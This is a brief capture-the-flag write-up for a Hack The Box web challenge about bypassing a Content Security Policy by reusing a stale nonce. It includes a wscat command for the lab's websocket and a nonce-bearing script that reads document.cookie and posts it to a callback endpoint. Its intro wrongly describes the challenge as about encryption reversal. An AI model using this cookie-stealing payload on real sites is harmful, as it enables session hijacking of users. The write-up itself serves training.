HackTheBox Cursed Stale Policy Writeup
Explore the basics of cybersecurity in the Cursed Stale Policy Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/811
Description
This policy is cursed, can you bypass it?
Exploitation
Looking at the code, the most developed aspect seems to be the logging in the websocket, so here’s the approach to interact with it:
1
wscat -c http://94.237.59.180:49425/ws
The nonce is shown in the default policy, and this is the already provided payload with the nonce:
1
2
3
4
5
6
7
<script nonce="5247551b650fb492cdb1cad3fe71d337">
fetch('/callback', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ cookies: document.cookie })
});
</script>
Trigger the Bot, and the result will be displayed either in the WebSocket logs or in the Request History.
Note: Previously, the Request History feature was not implemented, which is why using the websocket was necessary to capture the information.
Summary
The Cursed Stale Policy Challenge on Hack The Box is an easy-level cybersecurity challenge that focuses on bypassing web security measures by exploiting a nonce in a script. Participants use a script with a specified nonce to legally execute JavaScript that fetches and posts cookie data, navigating around the web security policy. This challenge provides insights into how nonce attributes can be leveraged to bypass security restrictions, offering a practical understanding of web policy enforcement and vulnerabilities.